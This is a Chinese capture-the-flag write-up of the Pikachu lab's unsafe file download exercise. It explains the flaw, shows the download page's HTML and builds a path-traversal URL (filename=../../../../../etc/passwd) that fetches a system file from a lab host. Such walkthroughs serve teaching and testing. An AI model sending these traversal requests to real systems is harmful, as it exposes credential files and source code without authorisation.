【CTF Web】Pikachu 不安全的文件下载 Writeup（文件下载+代码审计+路径遍历）

不安全的文件下载概述

文件下载功能在很多web系统上都会出现，一般我们当点击下载链接，便会向后台发送一个下载请求，一般这个请求会包含一个需要下载的文件名称，后台在收到请求后 会开始执行下载代码，将该文件名对应的文件response给浏览器，从而完成下载。 如果后台在收到请求的文件名后,将其直接拼进下载文件的路径中而不对其进行安全判断的话，则可能会引发不安全的文件下载漏洞。
此时如果 攻击者提交的不是一个程序预期的的文件名，而是一个精心构造的路径(比如…/…/…/etc/passwd),则很有可能会直接将该指定的文件下载下来。 从而导致后台敏感信息(密码文件、源代码等)被下载。
所以，在设计文件下载功能时，如果下载的目标文件是由前端传进来的，则一定要对传进来的文件进行安全考虑。 切记：所有与前端交互的数据都是不安全的，不能掉以轻心！
你可以通过“Unsafe file download”对应的测试栏目，来进一步的了解该漏洞。

提示

我就说一句,1996年的状元是艾弗森,但是下面这个列表里面kobe排在第一位,你说奇怪不奇怪吧。

---

解法

点击图片链接，可以下载图片。

审查元素。

<div class="page-content">

            <div id="usd_main" style="width: 600px;">
                <h2 class="title">NBA 1996年   黄金一代</h2>
                <p class="mes" style="color: #1d6fa6;">Notice:点击球员名字即可下载头像图片！</p>
                <div class="png" style="float: left">
                    <img src="download/kb.png"><br>
                    <a href="execdownload.php?filename=kb.png">科比.布莱恩特</a>
                </div>

                <div class="png" style="float: left">
                    <img src="download/ai.png"><br>
                    <a href="execdownload.php?filename=ai.png">阿伦.艾弗森</a>
                </div>

                <div class="png" style="float: left">
                    <img src="download/ns.png"><br>
                    <a href="execdownload.php?filename=ns.png">史蒂夫.纳什</a>
                </div>

                <div class="png" style="float: left">
                    <img src="download/rayal.png"><br>
                    <a href="execdownload.php?filename=rayal.png">雷.阿伦</a>
                </div>


                <div class="png" style="float: left">
                    <img src="download/mbl.png"><br>
                    <a href="execdownload.php?filename=mbl.png">斯蒂芬.马布里</a>
                </div>

                <div class="png" style="float: left">
                    <img src="download/camby.png"><br>
                    <a href="execdownload.php?filename=camby.png">马库斯.坎比</a>
                </div>

                <div class="png" style="float: left">
                    <img src="download/pj.png"><br>
                    <a href="execdownload.php?filename=pj.png">斯托贾科维奇</a>
                </div>

                <div class="png" style="float: left">
                    <img src="download/bigben.png"><br>
                    <a href="execdownload.php?filename=bigben.png">本.华莱士</a>
                </div>

                <div class="png" style="float: left">
                    <img src="download/sks.png"><br>
                    <a href="execdownload.php?filename=sks.png">伊尔戈斯卡斯</a>
                </div>

                <div class="png" style="float: left">
                    <img src="download/oldfish.png"><br>
                    <a href="execdownload.php?filename=oldfish.png">德里克.费舍尔</a>
                </div>

                <div class="png" style="float: left">
                    <img src="download/smallane.png"><br>
                    <a href="execdownload.php?filename=smallane.png">杰梅因.奥尼尔</a>
                </div>

                <div class="png" style="float: left">
                    <img src="download/lmx.png"><br>
                    <a href="execdownload.php?filename=lmx.png">阿卜杜.拉希姆</a>
                </div>
            </div>


        </div>

发现是通过

execdownload.php?filename=kb.png 

下载文件。图片地址：

http://172.17.149.214:8765/vul/unsafedownload/download/kb.png

构造 URL：

http://172.17.149.214:8765/vul/unsafedownload/execdownload.php?filename=../../../../../etc/passwd

下载到敏感文件。

---

声明

本博客上发布的所有关于网络攻防技术的文章，仅用于教育和研究目的。所有涉及到的实验操作都在虚拟机或者专门设计的靶机上进行，并且严格遵守了相关法律法规。

博主坚决反对任何形式的非法黑客行为，包括但不限于未经授权的访问、攻击或破坏他人的计算机系统。博主强烈建议每位读者在学习网络攻防技术时，必须遵守法律法规，不得用于任何非法目的。对于因使用这些技术而导致的任何后果，博主不承担任何责任。